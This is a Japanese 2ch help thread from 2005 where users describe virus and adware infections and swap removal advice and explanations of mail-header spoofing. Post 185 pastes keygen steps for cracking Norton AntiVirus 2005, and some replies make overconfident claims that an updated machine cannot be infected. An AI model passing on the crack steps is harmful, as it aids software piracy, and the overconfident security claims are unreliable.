今までに排熱ファンの稼動を止めてしまうようなウイルスやデバイス改ざんソフトの話題が出たことある?
80名無しさん@お腹いっぱい。:2005/05/06(金) 08:13:34
>>79
さっさと修理に出せ。
81名無しさん@お腹いっぱい。:2005/05/06(金) 09:49:36
         {!!!!`'ヽ、
          ~‐-,,=R
          _人 `j
        i ⌒    ノ
     ∧∧イ     ,;´
    ( ´_ゝ)    く
 _    j      ノ )
jjjj」  f¨      !_ ~ ̄ ̄ ̄~ーy,,   __,;-ー、
i ;~  j   ⌒ヽ´   ~ ー 、     ̄~~        `'ヽ
'!, `ーI  ;_ ミ     ̄~--、     ,,-ー"ー 、--'~   .'  , .. .∧_∧
 |   ` ノ  "''ー-人     ~ーヽ_;-ー"¨“''-'´  `ー;、  .∴ '   ( >>80
  ~- - ~       ̄''ー-,,__      _;-ー-;,_、   j ・,‘ r⌒>  _/ /
                 ̄'' ̄''--'´       "`'´ .  ’ | y'⌒  ⌒i
                                   |  /  ノ |
                                    ー'  /´ヾ_ノ
                                 / ,  ノ
                                / / /
                               / / ,'
                             /  /|  |
                            !、_/ /   〉
                                 |_/
82名無しさん@お腹いっぱい。:2005/05/06(金) 18:42:43
まあまじめな話、>>80が正解だと思うな。
83名無しさん@お腹いっぱい。:2005/05/06(金) 18:50:54
>>78
>>77です。セーフモードでも同じく真っ暗なんです…。
もうだめなんですかね?orz
84名無しさん@お腹いっぱい。:2005/05/06(金) 19:04:03
>>83
どうして「ウイルスにやられた」と思ったの?
まぁ、PCショップに修復依頼するのも良いとは思うけど、
修理費用の確認を忘れずに・・・。
85名無しさん@お腹いっぱい。:2005/05/07(土) 00:09:56
Meで
BITDefender使ってるんですが、

C:\_RESTORE\TEMP に
Win32.HLLW.Antinny.A

というウィルスが、何時の間にやら入り込んでいて困ってます。
どーにも、駆除できないようでして、お知恵をお借り致したく存じます。
86名無しさん@お腹いっぱい。:2005/05/07(土) 00:25:41
87名無しさん@お腹いっぱい。:2005/05/07(土) 00:49:50
>85
「何時の間に」は、入ってこないと思う。
8885:2005/05/07(土) 10:34:21
ああ、そうか。 ぬ○ぽのカスなんですね・・・。 orz ヤロウ、コノウラミハラサデオクベキカ
実害はないんですけど、気持ち悪いんでdownload板逝ってきまつ・・・   |   λ...
お邪魔いたしました。
89名無しさん@お腹いっぱい。:2005/05/07(土) 14:03:36
(´-`).。oO(まあ違法ダウソした挙句Antinnyなんか掛かったおまいがカスなんだがな)
90名無しさん@お腹いっぱい。:2005/05/07(土) 14:50:55
ついさっき親が知人に電話で相談を受けた内容を又聞きしただけなので
情報の絶対量が少なく恐縮なのですが
少し特徴的なものだったのでお尋ねさせていただきます。

インターネットを閲覧中に
"矢印" と "ドーナツのようなマーク" が表示されて
その後 "電源が落ち" "何度起動しようとしても起動しない" 
という症状が出ているとのことなのですが。

これだけで候補にあがるウィルスはあるでしょうか。

一応矢印や◎のキーワードでぐぐって見たのですがそれらしき記述も見つからず
もし心当たりがあれば教えていただけると幸いです。

知人のPCを買った時期から言って
恐らくXP、Updateは流石にわかりませんが、IEを使用していると思います。
9190:2005/05/07(土) 15:54:24
自己解決したらしいです、なにやったのか要領を得ない報告でしたが…。

スレ汚しスマソ。
92名無しさん@お腹いっぱい。:2005/05/07(土) 23:36:16
すいません。他の人は見れる掲示板(サイト)が自分だけ見れないのは
何が原因でしょうか?拒否などのメッセージはなくよくある
エラーなんですが。
同系のサイトは開けず。
掲示板は2chと似ている感じでトップ10は普通に見れるんですが
個別にスレを開くとやはりサイトと同じようにエラーで開けません。
ウィルスが原因でこうなることはあるんでしょうか?
93名無しさん@お腹いっぱい。:2005/05/08(日) 06:03:44
メールは受信する前にtyo_mailでチェックして、
スパムを削除してから受信してます。

今日届いたスパム、いつものようにメールサーバーで削除し終わっても
その直後に受信、削除してもまた受信…その繰り返しです。
もう10回以上繰り返しましたが、永遠に湧いてくるみたいです。
気持ち悪いです。

しつこいから受信してみたら、ウィルスでした。
ノートンで感染はしなかったのですが、
いいかげん削除したいです。
どうすればいいでしょう?

ちなみにタイトルが
 Your email was blocked
送信者が
 [email protected]
添付が
 error-mail_info.zip
94名無しさん@お腹いっぱい。:2005/05/08(日) 17:35:41
【使用OS】 XP 【WindowsUpdateしてるか】 はい
【AntiVirusは何を使っているか】 ノートン
【ちゃんとUpdateしてるか】 最低でも1週間に1度
【スキャンした結果(ウイルス名・発見場所)】
ノートンには引っかからなかった。ファイルの場所は不明。
CoolWebSearch。発見場所→IEのHP
【別のオンラインスキャンしたならその結果は】
CoolWebSearch専門のソフトを使ったが、通常でもセーフモードでやってみても異常なしと判断される。
ttp://www.higaitaisaku.com/removecws.html
スパイボットでも引っかからず。
【症状を具体的に、分かる限りすべて書く】
HPがCoolWebSearchになり続ける。
デスクトップが元に戻らず、真っ白のまま。コントロールパネル→画面→デスクトップには行けるが、
そこだけフリーズしたようにスクロールも何も動かない。クリックしても反応無し。
【何をしたらそんなことになったのか】
2chに貼り付けてあるURLでウイルス踏んでしまった。
【これまでにとった措置】
ノートン、スパイボット、レジストリ、HiJackThisであらかた取除いたがこれはずっと何もわからないまま。
【その他の質問】
ノートンでウイルスを発見して検疫したとき、PC内にはいるけれどウイルスは押さえられて悪さできない
状態、という解釈でいいんですか?
95名無しさん@お腹いっぱい。:2005/05/08(日) 17:41:30
>>94
新型でも出たんかな>CoolWebSearch

CoolWebSearchは厄介なんだよな。アダ被で質問がいいと思う。
96名無しさん@お腹いっぱい。:2005/05/08(日) 19:34:48
>>94
それどこ?
googkle?
97名無しさん@お腹いっぱい。:2005/05/08(日) 19:37:18
>>94
CoolWebSearch((゚Д゚)));)

>【WindowsUpdateしてるか】 はい
>AntiVirusは何を使っているか】 ノートン
>【ちゃんとUpdateしてるか】 最低でも1週間に1度
これなら、絶対に感染なんてしない。するはずないんや。
セキュリティの警告画面に、はいをクリックしなければ。

俺、CWS嫌
98名無しさん@お腹いっぱい。:2005/05/08(日) 20:00:01
>>97
>これなら、絶対に感染なんてしない。するはずないんや。

俺もそう思う。
99名無しさん@お腹いっぱい。:2005/05/08(日) 21:11:40
状況を正直に正しく書かんと的を得た答えはもらえないのにな・・・
100名無しさん@お腹いっぱい。:2005/05/09(月) 03:40:14
的を射た
101名無しさん@お腹いっぱい。:2005/05/09(月) 03:47:43
Win XPでOE使用ですが、NetSky.d が3通来ました。
アドレスを幾つも使い分けてて、このアドレスはユーザー登録用にしか使った事がなく
知人に送信とか掲示板の書き込み等は一度もした事がありません。
登録先で感染したのかと思ってソースを見ると、発信元は同じなようです。
(送信者は詐称するそうで、3通とも違っています。)

Received: from unknown (HELO u01.itscom.net) (220.150.177.86)
by mtiichi03e with SMTP; 7 May 2005 12:15:22 +0900

Received: from unknown (HELO u01.itscom.net) (220.150.177.86)
by mtiichi06e with SMTP; 8 May 2005 11:03:33 +0900

Received: from unknown (HELO u01.itscom.net) (220.150.177.86)
by mtiichi01e with SMTP; 8 May 2005 13:45:12 +0900

の3通ですが、アドレスを登録してたのは2ヶ所だけで、どちらもitscomではないと思うんです。
(大手企業だし、登録後に来た確認メール等見ても違ってました。)
普段使う他のアドレスには出会い系やら未承諾広告が山のように来ますが
これは2ヶ所の登録時以外に使ってないので過去に一度も不審メールが届いた事はありません。

この一番下のReceived:って発信元だと思うんですが、この (HELO u01.itscom.net) って何なんでしょう?
ドメイン検索で見たら、(220.150.177.86)はitscomじゃ無かったです。
私のNetSkyが届いたアドレスが***@u01.itscom.netなのですが、発信元の所にそれが表示されてるのは
いったいどういう理由なんでしょうか?(自分が送った場合は、ここにPC名が表示されますが・・・)
登録先2ヶ所とプロバイダー以外には知り得ないアドレスなので、気になります。
102名無しさん@お腹いっぱい。:2005/05/09(月) 05:33:35
>登録先で感染したのかと思ってソースを見ると、発信元は同じなようです。
>(送信者は詐称するそうで、3通とも違っています。)
何と何が同じで何と何が違うの?
103名無しさん@お腹いっぱい。:2005/05/09(月) 14:05:18
ウイルスきてます。
社内蔓延中。

NOTICE:***YOUR EMAIL ACCOUNT WILL BE SUSPENDED***
Email Account Suspension
などの件名にzipの添付ファイル。
注意してね(ハート)
104名無しさん@お腹いっぱい。:2005/05/09(月) 14:16:49
>>103
来てる来てる。
アフォどもが次々と感染した模様。
105名無しさん@お腹いっぱい。:2005/05/09(月) 14:19:21
http://ppp209-162.yomogi.or.jp/
wwwうはっwwwwwwおkwww

っうぇうはっwww
wwwwwwwwwwwwうはっwwwwおkwww
wwwっおkwwwwwwwwwっwwwwwwwwwwww
106名無しさん@お腹いっぱい。:2005/05/09(月) 16:51:53
>>103-104
俺のところにも来たよ。

だから得体の知れないメールの添付ソフトは実行するなとあれほど(ry
107名無しさん@お腹いっぱい。:2005/05/09(月) 17:32:58
俺のとこにもemail-info.exeがkitakita-

VirusScan君はまだ対応してないみたいですね...。
何するウィルスなんだろう。
108名無しさん@お腹いっぱい。:2005/05/09(月) 17:33:59
>>107
トレンドのトップにある

WORM_MYTOB.EC に対して イエローアラート が発令されました
WORM_MYTOB.ED に対して イエローアラート が発令されました

これですわ。
さっきEDの方を確認。
パターン早く出せやゴルァ!
109名無しさん@お腹いっぱい。:2005/05/09(月) 17:38:05
メールサーバとクライアントでベンダーが違うんで、サーバでうまく弾いてくれました。
まだSAVでは検出してくれないようだ。
110名無しさん@お腹いっぱい。:2005/05/09(月) 17:43:33
間違って>>103のzipファイル実行しちゃった。
解凍したら.pifファイルが出てきたんだけど、
そいつはさすがに実行してない。

zipファイルを実行しただけでもマズイ???
111名無しさん@お腹いっぱい。:2005/05/09(月) 17:49:36
>>110
それなら大丈夫。
112名無しさん@お腹いっぱい。:2005/05/09(月) 17:57:22
BIGLOBEの今日(5月9日)のメール遅延はウィルスが原因だそうです。
http://support.biglobe.ne.jp/info/shogaiap/service.html
113名無しさん@お腹いっぱい。:2005/05/09(月) 17:57:58
>>108
thx
うちのITアドミンに通報しますた
114名無しさん@お腹いっぱい。:2005/05/09(月) 18:33:51
【使用OS】 WinMX
【WindowsUpdateしてるか】 している
【AntiVirusは何を使っているか】 共有ソフト
【ちゃんとUpdateしてるか】 している
【スキャンした結果(ウイルス名・発見場所)】 ANTINNY.A
【別のオンラインスキャンしたならその結果は】 上に同じ
【症状を具体的に、分かる限りすべて書く】 起動すると終了する
【何をしたらそんなことになったのか】 何もやっていません
【これまでにとった措置】 スキャン
【その他の質問】 nyやっていません。信じてください。
そして助けて下さい。
115名無しさん@お腹いっぱい。:2005/05/09(月) 18:42:26
116名無しさん@お腹いっぱい。:2005/05/09(月) 18:44:18
117名無しさん@お腹いっぱい。:2005/05/09(月) 18:59:16
> 【使用OS】 WinMX
ワロス
118名無しさん@お腹いっぱい。:2005/05/09(月) 18:59:42
ウイルス対策ソフトをNortonからavastというソフトにしたいんですが、
その場合、Norton関連のプログラムは完全にアンインスト−ルしなきゃいけないんですよね?
あと、Norton Gobackというプログラムがあるんですが
(非常にアンインストールの時間が長そうなのだ途中で断念)
やはりavastを機能させるには、ちゃんと削除した方が良いんですかね?
スレ違いだったらスマソ

119名無しさん@お腹いっぱい。:2005/05/09(月) 19:06:30
>>118
クリーンインスコした方が良いと思われ。
ノートンはアンインストールがメンドイらしい。
120名無しさん@お腹いっぱい。:2005/05/09(月) 19:14:05
>>118
アンインストールのしかた
【ノートン】インターネットセキュリティ Ver.64【2005】
http://pc8.2ch.net/test/read.cgi/sec/1114417257/20

あとGobackってバックアップソフトでしょ。それは、そのままで
いいと思うのだが。俺も買おうかと今思案中w
121118:2005/05/09(月) 19:17:42
>>119
すみません、クリーンインスコってどういう意味ですか?

>>120
自分もGobackは消さなくても良いかなって思うんですが…
Gobackってどんな内容なのか判らないから
122名無しさん@お腹いっぱい。:2005/05/09(月) 19:38:15
Mytobが少しずつ増えてるような気がする。
会社や大学からが多いのは、
こいつは簡単なパスワードで共有にログオンを試みるせいかな?
123名無しさん@お腹いっぱい。:2005/05/09(月) 19:51:34
トレンド早くパターン出しやがれゴルァ
帰れないじゃねーか。
不祥事起こしたからって死ぬほど検証してんじゃねーだろーな(怒
124名無しさん@お腹いっぱい。:2005/05/09(月) 19:58:55
>>123
McAfee も(ry
125名無しさん@お腹いっぱい。:2005/05/09(月) 20:01:28
>>123-124
ほんとに遅い。

1社じゃ怖いので、2社体制にしたのだが・・・

トレンドもマカフィーも出ないのは、想定外!!

126名無しさん@お腹いっぱい。:2005/05/09(月) 20:04:33
>>125
Symantec も出てない模様。
出たのは、 Sophos だけのような気がする。
127名無しさん@お腹いっぱい。:2005/05/09(月) 20:33:09
>>126
トレンド早くパターン出しやがれゴルァ
マカフィー早くdatを出しやがれゴルァ

どっちかが出れば、帰れるんだよ。
128名無しさん@お腹いっぱい。:2005/05/09(月) 20:49:42
非公式に21時頃と聞いてたので試してみたら(コーポレートエディション)、
HTTP接続エラーって出やがる(怒
129名無しさん@お腹いっぱい。:2005/05/09(月) 20:56:34
と思ったら出たぞ(怒
130名無しさん@お腹いっぱい。:2005/05/09(月) 21:00:21
>>129
うん?トレンドの話?
131名無しさん@お腹いっぱい。:2005/05/09(月) 21:11:07
>>130
そうそうトレンド。
でもオレんとこに来たウイルスには反応しないなー。
132名無しさん@お腹いっぱい。:2005/05/09(月) 21:17:03
メール転送しようとしたら反応した。
トレンドマイクロ、パターン2.619.00です。
これで帰れる。
133名無しさん@お腹いっぱい。:2005/05/09(月) 23:04:42
McAfee マダー?
134名無しさん@お腹いっぱい。:2005/05/10(火) 01:20:55
3,4年位前の話です、ほとんどPCの知識のない頃でした
WinMEでアンチウィルス対策なしの状態でとあるエロサイトを見たあとに不具合発声

数分は何も起きないのですが、数分たつとデリートを押してるような状態になり
入力文字やエクスプローラーを開いてるとファイルがデリートされていくといった症状がありました

メーカーPCだったので修理に出しリカバリーしてもらったら直っていました

今思うとウィルスかスパイウェアだったのかなと思いますが
このような挙動をするウィルスに心当たりあるかたいますでしょうか?

なにぶん知識のない頃だったので情報が少なくて申し訳ないです
135名無しさん@お腹いっぱい。:2005/05/10(火) 03:34:49
>>102
送信者名は偽装されているので別名だけど
送信サーバーが同じ所から発信されていると言う事です。

どなたか>>101の (HELO u01.itscom.net) (220.150.177.86)
の説明をよろしくお願いいたします。
136名無しさん@お腹いっぱい:2005/05/10(火) 10:50:03
>>101>>135
感染PCがSMTP(送信)サーバであるmtiichi01eに接続した際に、
HELO 自分のホスト名
という形式で名乗ることになっている。
この時に、NETSKYに感染した端末は、SMTPサーバのネットワーク
を名乗って接続を試みる。

今回の場合は、
HELO u01.itscom.net
と名乗って接続したが、実際にはitscomのユーザではなく、
(220.150.177.86)が感染者(接続しているIPアドレス)である。

http://www2.arearesearch.co.jp/ip-kekka.php
↑などで検索すれば判るが、220.150.177.86はフリービット
のIPアドレスなので、フリービットのユーザが何らかの原因で
NETSKYに感染し、itscomのユーザを装ってitscomのSMTPサーバ
に接続してメールを送信したが、メールヘッダにはHELOで名乗
ったホスト名と実際の接続IPアドレスが記録されている訳。

メールアドレスが判った理由は、様々であるが、一般的には
感染者のPCに登録されているアドレス帳やインターネットの
キャッシュに残っているメールアドレス、テキストやCSV形式
のファイル等から収集したメールアドレスを、送信者名、及び
宛先メールアドレスに使うようになっている。

あるいは、ランダムにアカウント名を生成してメールを送信
する場合もあるので、何故かという問いには確実な答えは難しい。
137名無しさん@お腹いっぱい。:2005/05/10(火) 15:05:13
何故か最近Windowsを起動した直後にIEがv5.webnetsecure.comにアクセスしています。
タスクマネージャーを見ていて"IEXPLORE.EXE"がIEを起動してないのに勝手に起動していて変だと思い、
アクセス先を監視してみたらどうも上記のURLに勝手に繋がっているようです。
タスクマネージャーでIEXPLORE.EXEを強制終了させてもまた時間がたつと勝手に起動します。
関係はないかもしれませんが、起動直後に勝手にマイドキュメントが開くようにもなりました。
これは何かのウィルスなのでしょうか?
当方WinXP Pro SP1を使用しております。
138名無しさん@お腹いっぱい。:2005/05/10(火) 15:08:32
ウイルスだろうね。スキャンしてよ。
139137:2005/05/10(火) 15:12:18
ごめんなさい、テンプレちゃんと読んでませんでした。

【使用OS】
WinXP Pro SP1
【WindowsUpdateしてるか】
しています
【AntiVirusは何を使っているか】
NOD32
【ちゃんとUpdateしてるか】
自動でアップデートしているようです
【スキャンした結果(ウイルス名・発見場所)】
何も検出しませんでした。
【別のオンラインスキャンしたならその結果は】
まだしておりません
【症状を具体的に、分かる限りすべて書く】 上にも書きましたが
何故か最近Windowsを起動した直後にIEがv5.webnetsecure.comにアクセスしています。
タスクマネージャーを見ていて"IEXPLORE.EXE"がIEを起動してないのに勝手に起動していて変だと思い、
アクセス先を監視してみたらどうも上記のURLに勝手に繋がっているようです。
タスクマネージャーでIEXPLORE.EXEを強制終了させてもまた時間がたつと勝手に起動します。
関係はないかもしれませんが、起動直後に勝手にマイドキュメントが開くようにもなりました。
【何をしたらそんなことになったのか】
海外のサイトに行ったときにポップアップがやたら出てきたのが原因だと思います。
【これまでにとった措置】
ウィルススキャン、v5.webnetsecure.comへのアクセスの遮断
【その他の質問】
よろしくお願いいたします。
140名無しさん@お腹いっぱい。:2005/05/10(火) 16:17:28
dlmax.dll
localNRD.dll
NDNuninstall6_38.exe
preInsln.exe
ATPartners.dll
ezt3.exe
megaV2Wbr.dll
sahagent1019.exe
setup_incred_2.exe
Splpmt.dll
WebRebates_Auto_InstallSilent.exe
winup.exe
Unix.Penguin
VBS.Network.E
この中で、削除しても(・∀・)イイ!!のと(・A・)イクナイ!!のと(゚ε゚)キニシナイ!!
のを教えてください。(ezt3.exeとsetup_incred_2.exeについては何の情報も無かったです)
141名無しさん@お腹いっぱい。:2005/05/10(火) 16:32:51
>>140
情報のないのはウィルスが適当につけた名前のものが多い
142名無しさん@お腹いっぱい。:2005/05/10(火) 16:42:53
URLにMP3と書かれてあるファイルは、ダウンロードしても
ウィルスの心配は無いのでしょうか?
143140:2005/05/10(火) 17:03:31
今だいたい調べてきましたが
dlmax.dll (・∀・)イイ!
localNRD.dl (・∀・)イイ!l
NDNuninstall6_38.exe (・∀・)イイ!
preInsln.exe (゚ε゚)キニシナイ!!
ATPartners.dll (・∀・)イイ!
ezt3.exe (・∀・)イイ!
megaV2Wbr.dll (・∀・)イイ!
sahagent1019.exe (・∀・)イイ!
setup_incred_2.exe (・∀・)イイ!
Splpmt.dll (・∀・)イイ!
WebRebates_Auto_InstallSilent.exe (・∀・)イイ!
winup.exe (゚ε゚)キニシナイ!!
Unix.Penguin (゚ε゚)キニシナイ!!
VBS.Network.E  (゚ε゚)キニシナイ!!
でいいんでしょうか?
144名無しさん@お腹いっぱい。:2005/05/10(火) 17:35:53
すみません質問させてください。
ホームページが401MPV Warningというのになってしまい、変えることができません。
おそらく、海外アダルトサイトからのものだと思われます・・・
どなたかご存知の方いませんか?やっぱりリカバリーしないとだめなのかな・・?
145名無しさん@お腹いっぱい。:2005/05/10(火) 17:43:58
>>144
板違い。
PC初心者板http://pc8.2ch.net/pcqa/
エロサイト見たら…助けて下さい!Part54
http://pc8.2ch.net/test/read.cgi/pcqa/1115237587/l50へ
146名無しさん@お腹いっぱい。:2005/05/10(火) 18:09:52
>>139
これ参考に、まずはスタートアップの内容調べてみたら?

いらない常駐ソフトを減らし、起動を速くする。
ttp://www003.upp.so-net.ne.jp/shigeri/speedup/speedup1.html
147名無しさん@お腹いっぱい。:2005/05/10(火) 19:23:15
>>105
こういうの最近よく見るけど何?
148名無しさん@お腹いっぱい。:2005/05/10(火) 19:59:53
>>137
砂箱入れれ
149名無しさん@お腹いっぱい。:2005/05/10(火) 20:32:47
助けてくれ
初心者だからわからん
【使用OS】 windows ny(略してwinny)
【WindowsUpdateしてるか】 何それ?
【AntiVirusは何を使っているか】 初心者だからわからん
【ちゃんとUpdateしてるか】 さあ?
【スキャンした結果(ウイルス名・発見場所)】 何もわからん
【別のオンラインスキャンしたならその結果は】 何も知らん
【症状を具体的に、分かる限りすべて書く】 共有ソフト使用中に不安定に
【何をしたらそんなことになったのか】 windows mxからwindows nyにグレードアップ
【これまでにとった措置】 EXEの実行
【その他の質問】 winnyもやっていない。何もやっていない。本当です。
信じてください。助けて下さい。お願いします。
150名無しさん@お腹いっぱい。:2005/05/10(火) 20:38:43
つまんねぇ
151名無しさん@お腹いっぱい。:2005/05/11(水) 01:23:18
すみませんが教えてください。ウイルスに感染してしまって、
もっとも最悪なケースはどうなってしまうことなんですか?
いろいろあると思いますけど、教えてください。
152名無しさん@お腹いっぱい。:2005/05/11(水) 01:32:30
>>151
PCが使いものにならなくなる。
個人情報などが流れて、現在の地位・財産などが失われる。

153名無しさん@お腹いっぱい。:2005/05/11(水) 02:53:20
>>152
ありがとうございました。あとよくOSを再インストしろって
書いていますがそのメリットとデメリットを教えてください。
154名無しさん@お腹いっぱい。:2005/05/11(水) 02:53:30
>>136
なるほど・・・(220.150.177.86)からの送信でもホスト名は接続SMTP名に
偽装?されてるって事なんですね。
私のPCは感染してないのは確実なのに、アドレスと同じドメインが出てたので
何だよー、これは?と気になってました。
itscomで無料のウィルスチェックが有るので元のサーバーから削除だと思ってたら
今回調べてみると、無料でもアドレス毎に申し込まないとチェックされないものだったので
早速申し込んでおきました。

通常使っている他のアドレスは数字も混ぜた複雑なアカウント名にしてますが
これはごく簡単で短い英単語だけなので、ランダムに送信された可能性が高いかと思います。

ウィルスはムカつくけど、謎が解けてちょっとはスッキリしました。
どうもありがとうございました!
155名無しさん@お腹いっぱい。:2005/05/11(水) 03:00:41
>>153
メリット:きれいな環境を再び整えることだできる
デメリット:大事なファイルも全て消えてしまう上にひたすら面倒くさい
156名無しさん@お腹いっぱい。:2005/05/11(水) 07:09:30
【使用OS】 Windows XP
【WindowsUpdateしてるか】 しています
【AntiVirusは何を使っているか】 マカフィー ウィルススキャン
【ちゃんとUpdateしてるか】 自動アップデートしています
【スキャンした結果(ウイルス名・発見場所)】 何も
【別のオンラインスキャンしたならその結果は】
シマンテックでスキャンしたところ、
Adware.SAHAgent、W32.Sasser.Worm、Adware.180Search、Adware.MediaPass 、
Download.Trojanなどに感染したファイルを11個見つけました
【症状を具体的に、分かる限りすべて書く】
いきなりパソコンが異常に重くなったのでスキャンしてみました
【これまでにとった措置】
ウィルスの情報のページを見ながら駆除しようとしています
【その他の質問】
ウィルスの情報のページを見ていると感染しているファイルを全て削除しろと
書いていますが、70tovmto.exe、system32/2b3fsk0h.dll、system32/bln02nqv.exe、
system32/cmd.ftp、gah95on6.exe、temp/salmhook.dll、Media Access/MediaAccC.dll、
Media Access/MediaAccess.exe、Media Access/MediaAccK.exe、Internet Explorer/cgqqrfge.exe、
Internet Explorer/ua.exe
などのファイルは削除してしまっても問題のないものなのでしょうか?
マカフィーが最近正式に作動しないので、近いうちにノートンを買ってくる予定ですが、
そういったソフトを使って駆除してもらうべきですか?
お願いします
157名無しさん@お腹いっぱい。:2005/05/11(水) 08:12:51
>156
それぞれのファイル名でググッてみれば、大体見当がつきますよ。
158名無しさん@お腹いっぱい。:2005/05/11(水) 10:32:04
>>156
マカフィーで検出できなかったというのがスゴイ。
159名無しさん@お腹いっぱい。:2005/05/11(水) 11:24:16
>>155
ありがとうございます。それは買ってきた時の初期状態に
戻るということですか?それと再インストすればもうウイルス
は完全になくなるのですか?

160名無しさん@お腹いっぱい。:2005/05/11(水) 11:42:43
>>156
マカフィーって凄いんだなw
saseerに感染してるのに、再起動繰り返してないんか?

>W32.Sasser.Worm
これはシマンテックで駆除ツール落として駆除

AdwareはAd-Aware使って駆除

で、後まだおかしかったら↓のスレのテンプレ全部実行のち質問

エロサイト見たら…助けて下さい!Part54
http://pc8.2ch.net/test/read.cgi/pcqa/1115237587/
161156:2005/05/11(水) 13:26:12
みなさんどうもありがとうございます!
昔saseerを見つけてきて、駆除→失敗、削除→失敗
という流れになったことはあります。
マカフィーはどのウィルス見つけてもこうなるんですが、
これって何の解決にもなってなかったんでしょうか…。
SasserとAdwareは駆除できそうですが他はどうすればいいのかわかりません。
一つ一つ検索かけてみます。
162名無しさん@お腹いっぱい。:2005/05/11(水) 13:29:07
>>156
親玉がいるからソフトで自動駆除出来ねえよ
初心者はリカバリー
それか、駆除、復活のループ地獄
163名無しさん@お腹いっぱい。:2005/05/11(水) 13:48:55
>>159
そう考えて差し支えない。

>>156
漏れもリカバリーに1票。
自分でひとつひとつ駆除して勉強したいと言うならそれもいいと思うけど。
164名無しさん@お腹いっぱい。:2005/05/11(水) 16:52:22
すいません、
>>142
の質問、わかる方おねがいしまつ。
165名無しさん@お腹いっぱい。:2005/05/11(水) 16:54:26
>>164
絶対無いとは言えない。
166名無しさん@お腹いっぱい。:2005/05/11(水) 17:00:52
>>165
即レスありがとうございます。mp3のファイルはダウンロード
する時にノートンスキャンできないみたいなので、大丈夫なのかと
思ってました。ありがとうございました!
167名無しさん@お腹いっぱい。:2005/05/12(木) 00:09:28
mp3のファイルにウィルスってどうやって組み込めるの?
168名無しさん@お腹いっぱい。:2005/05/12(木) 00:22:02
>>167
単に拡張子をmp3に変えるだけでは?
169名無しさん@お腹いっぱい。:2005/05/12(木) 00:56:38
>>167
・URL偽装でMP3ファイルに見せ掛けてダウソさせる。
・メジャーな音楽再生ソフトの脆弱性を利用する(別の不正プログラムと組み合わせて使う)
等も考えられるが。
170名無しさん@お腹いっぱい。:2005/05/12(木) 04:45:15
質問です
XPを使っていて、最近ネットに繋ぐようになりました。
インターネットに繋ぐと、何分かすると、「シャトダウんしま」す。
と表示され、再起動されてしまいます。
だいぶ前にはやったウィルスみたいなんですが、対処法が解りません助けてください。
171名無しさん@お腹いっぱい。:2005/05/12(木) 06:17:20
変わった表示ですね。初めて見ましたよ。>「シャトダウんしま」す。
172名無しさん@お腹いっぱい。:2005/05/12(木) 06:36:11
173名無しさん@お腹いっぱい。:2005/05/12(木) 07:45:38
【使用OS】 WindowsMe
【WindowsUpdateしてるか】 しています
【AntiVirusは何を使っているか】 ウイルスバスター2005
【ちゃんとUpdateしてるか】 しています
【スキャンした結果(ウイルス名・発見場所)】 Adware.SAHAgent Adware.180Search 
Adware.MediaPass Trojan.ByteVerify
【別のオンラインスキャンしたならその結果は】 シマンテック ウイルスバスター(どちらもオンライン)
【症状を具体的に、分かる限りすべて書く】 昨日シマンテックのウイルススキャンをしたところ
上記のウイルスが発見されました。その後ウイルスバスターで再度スキャンしたところ
発見されませんでした。このような場合はどうすればいいのでしょうか?
ご存知の方教えてください
【何をしたらそんなことになったのか】 ネットでゲームや検索等
【これまでにとった措置】 
【その他の質問】 
174名無しさん@お腹いっぱい。:2005/05/12(木) 08:10:07
>>173
最初のスキャンでウイルス駆除したのなら後のスキャンで発見されなくてもnp
175名無しさん@お腹いっぱい。:2005/05/12(木) 09:18:08
>>174
最初のスキャンはシマンテックのオンラインスキャン(スキャンのみで駆除はできず・・・)
だったのでウイルスを発見しウイルスバスターで駆除しようとしても
そのウイルスは発見されませんでした。

この場合はウイルスバスターがまだそのウイルスに対応していないということでしょうか?
ということはこのまま駆除できず・・・ってことでしょうか・・・
ご存知の方教えてくださいm(__)m
176名無しさん@お腹いっぱい。:2005/05/12(木) 10:22:44
>>175
よく似たもん拾ってるよな、>>156かとオモタ
>>160読め

177名無しさん@お腹いっぱい。:2005/05/12(木) 12:23:24
うちのマクが起動すると画面にPANICPANIC…といっぱい出るらしい。よくわからんがウィルスかなぁ。
178名無しさん@お腹いっぱい。:2005/05/12(木) 13:10:27
ノートンで「侵入の試みを検出して遮断しました。」という警告が出ました。
これは通報した方がいいのでしょうか?
179名無しさん@お腹いっぱい。:2005/05/12(木) 13:23:24
>>178
ほっとけ。ウィルスが勝手に飛んできてることがほとんど。犯罪に当たらず。
180名無しさん@お腹いっぱい。:2005/05/12(木) 15:00:53
>>178
そんなんあるのか。60へぇ。
181名無しさん@お腹いっぱい。:2005/05/12(木) 15:29:59
TROJ_AGENT.ABS
っていうウイルスが定期的にリアルタイムで検出されて隔離されます。
ウイルスバスター2005です。OSはXPです。
アングラなサイト探検してたらブラウザ開きまくって、いくつかウイルスにかかって他は削除・隔離されたんですが
それだけは未だに続いてます。ウイルス検索してもひっかからないのに
それ以来普通のサイト見てても定期的にリアルタイム検出されます。広告ページも時々勝手に出ます。
ファイル名C¥WINDOWS\System\32poller.exeになってます。削除してもしても同じものが出てきます。
どうすればよいでしょうか。
182名無しさん@お腹いっぱい。:2005/05/12(木) 15:37:37
ウィルスかどうかわからないんですが、
C:\WINDOWS\system32 に update5440791.log という名前の10ギガのテキストファイルができています。
削除しても数分後に再びできていて消えません。
ウィルスバスターでチェックをしても何も見つからないのでどうしたらいいかわかりません。
どのたか教えてください。よろしくお願いします。
183181:2005/05/12(木) 15:55:46
ウイルスというか、トロイ?みたいです。よくわかりません。
どうすれば良いかお願いします。
184名無しさん@お腹いっぱい。:2005/05/12(木) 15:57:28
>>181
OS再インスコ
アングラ出入りするの10年早いかもよ
185名無しさん@お腹いっぱい。:2005/05/12(木) 16:07:55
ノートンの割れソフトを手に入れました。使い方が英語でよくわかりません。
詳しく教えてください。

tmg-nav2k5.exe
1.Open the crack using winrar.
2.dowble click on tmg-nav2k5.exe
3.click on generate. It will generate the Cd key paste the cd key wen u install NAV 2005
4. Install Nav2005
5. Click on acitvate the software. Make sure u disconnect from the internet.
  Pull out any cable or phone wires from the COM.. or in simple words " DISCONNECT FROM THE INTERNET"
6. NAV will try to connect to connect to its severs. click next until u get the activate software by phone diaolog.
7. Enter the fone reg code into the keygen. n click generate.
 it will generate the reg code. Paste it on the NAV 2005. It is now a full version

Enjoy ..
186181:2005/05/12(木) 16:10:21
まじですか。
これはいったいどこから来るんでしょか・・
絶対再インスコしないと無理ですか
187名無しさん@お腹いっぱい。:2005/05/12(木) 16:12:00
>>186
あなたの愚かな行為から来ていると思います。
188181:2005/05/12(木) 16:26:10
